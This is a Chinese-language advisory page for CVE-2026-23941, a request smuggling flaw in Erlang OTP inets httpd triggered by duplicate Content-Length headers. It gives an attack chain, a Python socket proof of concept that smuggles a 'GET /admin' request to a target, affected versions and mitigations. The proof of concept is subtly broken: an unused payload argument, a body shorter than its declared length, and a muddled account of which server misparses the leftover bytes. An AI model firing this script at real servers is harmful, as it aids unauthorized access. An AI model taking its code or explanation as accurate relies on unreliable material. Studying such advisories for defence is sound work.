CVE-2026-23941 Erlang OTP inets httpd HTTP Request Smuggling漏洞

漏洞信息

漏洞编号

CVE-2026-23941

漏洞类型

HTTP Request Smuggling

CVSS评分

9.4 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Erlang OTP inets httpd模块

漏洞概述

CVE-2026-23941是Erlang OTP的inets httpd模块中存在的高危HTTP请求走私漏洞。该漏洞源于服务器对重复Content-Length头的不当处理：服务器使用请求中最先出现的Content-Length值来解析请求体，而常见的反向代理（如nginx、Apache httpd、Envoy）则使用最后出现的Content-Length值。这种行为差异违反了RFC 9112 Section 6.3标准，导致攻击者可以构造特殊的HTTP请求实现前端与后端服务器的请求解析不一致。攻击成功后，攻击者注入的恶意数据会被队列化为下一个请求的开头部分，可能导致会话劫持、缓存污染、跨站脚本攻击等严重后果。由于该漏洞无需认证即可利用，且CVSS评分高达9.4，属于极其严重的安全威胁。

技术细节

HTTP请求走私漏洞的核心在于前端和后端对HTTP请求边界解析的不一致性。在正常情况下，当HTTP请求包含多个Content-Length头时，服务器应该拒绝请求或对其进行规范化处理。然而，Erlang OTP的inets httpd模块直接使用第一个Content-Length值来确定请求体长度，而反向代理通常使用最后一个值。攻击者可以通过构造如下请求来实现攻击：发送包含两个Content-Length头的请求，第一个值较小，第二个值较大。例如：Content-Length: 10\r\nContent-Length: 100\r\n\r\nABCDEFGHIJ。服务器会根据第一个Content-Length（10）解析请求体，将ABCDEFGHIJ后的内容视为下一个请求的开始。而反向代理根据第二个Content-Length（100）等待100字节的请求体，导致剩余的90字节数据被当作下一个请求的一部分，从而实现请求走私攻击。这种攻击可用于绕过安全控制、劫持用户会话或污染Web缓存。

攻击链分析

STEP 1

步骤1: 信息收集

识别目标服务器使用Erlang OTP inets httpd模块，并确认存在反向代理（nginx/Apache/Envoy）作为前端

STEP 2

步骤2: 构造恶意请求

构造包含两个不同值Content-Length头的HTTP请求，第一个值较小，第二个值较大

STEP 3

步骤3: 发送走私请求

将恶意请求发送至目标服务器，同时附加第二个HTTP请求的部分内容

STEP 4

步骤4: 触发解析不一致

Erlang OTP后端使用第一个Content-Length值解析请求，将剩余数据作为下一个请求的开始；反向代理使用第二个值等待更多数据

STEP 5

步骤5: 攻击利用

攻击者注入的恶意数据被后端服务器当作独立的HTTP请求解析，可能导致未授权访问、敏感信息泄露或会话劫持

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import time

def send_http_request_smuggling(target_host, target_port, payload):
    """
    HTTP Request Smuggling PoC for CVE-2026-23941
    Erlang OTP inets httpd module vulnerability
    
    This PoC demonstrates the inconsistent handling of duplicate Content-Length headers.
    """
    # Construct smuggling request with duplicate Content-Length headers
    # First CL is used by Erlang OTP, second by reverse proxies
    smuggling_request = (
        f"POST / HTTP/1.1\r\n"
        f"Host: {target_host}:{target_port}\r\n"
        f"Content-Length: 10\r\n"  # First CL - used by Erlang OTP
        f"Content-Length: 100\r\n"  # Second CL - honored by reverse proxies
        f"\r\n"
        f"SMUGGLED"  # 8 bytes + padding to trigger desync
    )
    
    # Second request that will be partially consumed
    second_request = (
        f"GET /admin HTTP/1.1\r\n"
        f"Host: {target_host}\r\n"
        f"\r\n\r\n"
    )
    
    # Full payload: first request + partial second request
    # Erlang OTP will see: first request body (10 bytes) + leftover bytes
    # Reverse proxy will see: first request + full second request
    full_payload = smuggling_request + second_request
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_host, target_port))
        sock.send(full_payload.encode('utf-8'))
        
        # Wait for response
        time.sleep(1)
        response = sock.recv(4096)
        sock.close()
        
        return response.decode('utf-8', errors='ignore')
    except Exception as e:
        return f"Error: {str(e)}"

# Example usage
if __name__ == "__main__":
    target = "example-vulnerable-server.com"
    port = 8080
    print("Sending HTTP Request Smuggling payload...")
    result = send_http_request_smuggling(target, port, "test")
    print(f"Response: {result}")

影响范围

Erlang OTP 17.0 至 28.4.1

Erlang OTP 27.3.4.9

Erlang OTP 26.2.5.18

inets 5.10 至 9.6.1

inets 9.3.2.3

inets 9.1.0.5

防御指南

临时缓解措施

在临时缓解措施方面，如果无法立即升级，可采取以下措施：在前端反向代理（如nginx）中配置规则，拒绝包含多个Content-Length或Transfer-Encoding头的请求；对所有HTTP请求头进行规范化处理；启用代理的严格HTTP解析模式；监控异常的HTTP请求模式；考虑临时禁用存在漏洞的inets httpd模块或在其前部署WAF进行过滤。